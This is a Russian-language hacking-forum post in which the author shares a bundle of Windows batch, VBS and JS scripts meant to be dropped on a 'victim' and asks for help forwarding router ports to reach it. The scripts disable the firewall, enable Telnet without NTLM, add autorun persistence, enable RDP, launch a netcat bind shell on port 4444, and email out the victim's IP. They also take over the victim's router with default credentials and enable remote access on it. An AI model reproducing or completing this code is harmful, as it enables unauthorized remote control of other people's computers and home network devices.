Форум АНТИЧАТ - Показать сообщение отдельно

Проброс портов

Помогите с port forwarding как прописать iptables

вообщем суть есть скрипты которые склееваются и закидываются жертве:

GetMyIP

browser.bat--опред. ip

ip.vbs -отправка ip на мыло

inst.bat - telnet,отк. фаера,автозагрузка и т.д

код:

@echo off

set dest=%windir%

set js=ins.js

set arun=HKLM

set arun1=HKLM

netsh advfirewall set allprofiles state off

sc config SharedAccess start= disabled

netsh advfirewall firewall add rule name="Allow port range" dir=out protocol=tcp localport=4444 action=allow

netsh advfirewall firewall add rule name="Allow port range" dir=out protocol=tcp localport=972 action=allow

pkgmgr /iu:"TelnetClient"

//pkgmgr /iu:"TelnetServer"

regedit /s conf.reg

sc config tlntsvr start= auto

tlntadmn config port=972 sec=-NTLM

net start Telnet

copy %js% %dest%\%js%

set cmdline=%dest%\%js%

reg add %arun%\Software\Microsoft\Windows\CurrentVersion\R un /v "%js%" /t REG_SZ /d "%cmdline%" /f

reg add %arun1%\System\CurrentControlSet\Control\Terminal Server /v fDenyTSConnections /t REG_DWORD /d 0 /f

start %cmdline%

time.bat -проверка сети

@echo off

:loop

ping -n 1 www.mail.ru | find "TTL=" > nul

if errorlevel 1 goto loop

start /b nc.exe -l -p 4444 -e cmd.exe

modem.bat - изменяет настройки модема

ins.vbs -запускает всю эту лабуду

код:

var WSHShell = WScript.CreateObject("WScript.Shell");

WSHShell.Run("browser.bat",0, true);

WSHShell.Run("ip.vbs",0, true);

WSHShell.Run("modem.vbs",0, true);

WSHShell.Run("time.bat",0, true);

не могу сделать проброс портов на 4444 порт для netcat (ip динамический)

код modem.vbs

On Error Resume Next

Set oShell = WScript.CreateObject("WScript.Shell")

oShell.Run "telnet 192.168.1.1" -- подключаюсь

WScript.Sleep 5000

oShell.SendKeys "admin" & chr(13)

WScript.Sleep 5000

oShell.SendKeys "admin" & chr(13)

WScript.Sleep 5000

oShell.SendKeys "passwd admin 1234" & chr(13)--меняю пароль

WScript.Sleep 5000

oShell.SendKeys "remoteaccess enable --service SSH" & chr(13)

WScript.Sleep 10000

oShell.SendKeys "remoteaccess enable --service TELNET" & chr(13)

WScript.Sleep 10000

oShell.SendKeys "iptables -t filter -A INPUT -p tcp --dport 4444 -j ACCEPT" & chr(13)

вот правила iptables:

> iptables -t filter -nL

Chain INPUT (policy ACCEPT)

target prot opt source destination

ACCEPT udp -- 192.168.1.0/24 0.0.0.0/0 udp dpt:30006

ACCEPT tcp -- 0.0.0.0/0 0.0.0.0/0 tcp dpt:30005

ACCEPT all -- 0.0.0.0/0 0.0.0.0/0 state RELATED,ESTABLISHED

LOG tcp -- 0.0.0.0/0 0.0.0.0/0 tcp flags:0x16/0x02 limit: avg 6/hour burst 5 LOG flags 0 l

evel 1 prefix `Intrusion -> '

DROP all -- 0.0.0.0/0 0.0.0.0/0

ACCEPT tcp -- 0.0.0.0/0 0.0.0.0/0 tcp dpt:4444

Chain FORWARD (policy ACCEPT)

target prot opt source destination

ACCEPT udp -- 192.168.1.0/24 0.0.0.0/0 udp dpt:30006

ACCEPT tcp -- 0.0.0.0/0 0.0.0.0/0 tcp flags:0x06/0x02 TCPMSS clamp to PMTU

TCPMSS tcp -- 0.0.0.0/0 0.0.0.0/0 tcp flags:0x06/0x02 TCPMSS clamp to PMTU

ACCEPT all -- 0.0.0.0/0 0.0.0.0/0 state RELATED,ESTABLISHED

LOG tcp -- 0.0.0.0/0 0.0.0.0/0 tcp flags:0x16/0x02 limit: avg 6/hour burst 5 LOG flags 0 l

evel 1 prefix `Intrusion -> '

DROP all -- 0.0.0.0/0 0.0.0.0/0

Chain OUTPUT (policy ACCEPT)

target prot opt source destination

>